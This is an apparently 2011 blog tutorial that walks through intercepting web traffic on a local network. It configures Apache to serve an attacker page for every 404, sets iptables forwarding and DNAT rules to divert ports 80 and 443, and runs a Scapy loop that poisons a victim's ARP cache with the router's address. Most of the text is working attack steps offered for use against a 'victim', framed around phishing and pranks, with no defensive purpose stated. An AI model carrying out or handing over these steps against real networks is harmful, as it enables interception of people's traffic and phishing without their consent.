October 9, 2011 at 12:00 PM
In this article, I will explain how to intercept and control the web (HTTP/S) traffic of single or multiple hosts within a local area network. The attack itself is rather simple. First, an attacker poisons the ARP cache of a victim's workstation - effectively making the attacker a middle man between the victim and the router. Next, the victim generates some sort of web traffic which is intercepted by the attacker and redirected to a HTTP server controlled by the attacker. Thus opening up the possibility for anything from a simple MITM phishing scheme, to a network wide Rick Roll.
[ Prerequisites ]
Before we begin, you'll need the following:
Note: If you don't have a Linux workstation handy, then the Backtrack live CD is your best friend.
[ Step 1: Configure HTTP Server ]
There are only two things you need to configure on your HTTP server. First set your index page to whatever you want your victim to see. Next, and this is crucial, you need to set your index page as the page displayed for 404 errors. On Apache you do this by opening the httpd.conf file and searching for "ErrorDocument 404", this should bring you to a line that looks like:
#ErrorDocument 404 /missing.html
You want to change this line to:
ErrorDocument 404 /news.py
The reason this is needed, is incase a victim requests something like, "http://myspace.com/index.cfm?fuseaction=user", they'll still be redirected to your intended page, instead of the standard Error 404 page.
[ Step 2: Configuring IP Tables ]
The next step is to configure IP Tables to listen for incoming traffic on a network interface and to either forward that traffic to the router, or to your HTTP server. This is done with following commands:
# These first four commands enable traffic forwarding, and tell IP Tables to listen for traffic # on interface eth0 and to forward it out interface eth0. echo 1 > /proc/sys/net/ipv4/ip_forward echo 0 > /proc/sys/net/ipv4/conf/eth0/send_redirects iptables --append FORWARD --in-interface eth0 --jump ACCEPT iptables --table nat --append POSTROUTING --out-interface eth0 --jump MASQUERADE # These next two commands tell IP Tables to change the destination address for any traffic # received on TCP port 80 or 443 to the IP Address of your HTTP server. iptables -t nat -A PREROUTING -p tcp --dport 80 --jump DNAT --to-destination HTTP_Server_IP iptables -t nat -A PREROUTING -p tcp --dport 443 --jump DNAT --to-destination HTTP_Server_IP
[ Step 3: Poison The ARP Cache ]
Now that you've configured your system, it's finally time to carry out the attack! How you carry out this step is really up to you. All you need to do is poison the target's ARP cache so that the IP address of the router points to your workstation. There are many tools out there that can be used to accomplish this task, however in this tutorial I will be using Python and the Scapy module. Open up your Python interpreter and enter the following commands.
>>> import scapy, time # imports the scapy and time modules >>> a = scapy.ARP() # creates an ARP packet object >>> a.psrc = "192.168.1.1" # sets the 'from' IP address to the router's >>> a.pdst = "192.168.1.12" # the leech's IP address >>> while 1: ... scapy.send(a) # sends the packet ... time.sleep(90) # tells python to sleep for 90 seconds, and then send the packet again
[ Finale ]
Finally, you have finished your attack. You now have full control of your target's web traffic. Feel free to laugh maniacally at whatever dark horrors you've just exposed your victim to.